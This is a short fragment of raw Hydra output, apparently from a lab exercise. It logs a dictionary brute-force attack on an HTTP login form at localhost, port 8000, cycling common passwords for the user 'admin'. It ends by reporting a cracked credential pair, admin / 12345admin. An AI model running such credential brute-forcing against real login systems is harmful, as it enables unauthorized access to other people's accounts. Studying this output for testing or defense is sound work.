"admin" - pass "asdf" - 192 of 1717 [child 13] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "asd123" - 193 of 1717 [child 0] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "superman" - 194 of 1717 [child 1] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "jessica" - 195 of 1717 [child 3] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "love" - 196 of 1717 [child 14] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "samsung" - 197 of 1717 [child 2] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "shadow" - 198 of 1717 [child 12] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "blink182" - 199 of 1717 [child 15] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "333333" - 200 of 1717 [child 8] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "michael1" - 201 of 1717 [child 7] (0/0)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[ATTEMPT] target localhost - login "admin" - pass "babygirl1" - 202 of 1717 [child 4] (0/0)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[8000][http-post-form] host: localhost   login: admin   password: 12345admin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[STATUS] attack finished for localhost (valid pair found)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 of 1 target successfully completed, 1 valid password found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Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-10-12 00:00:44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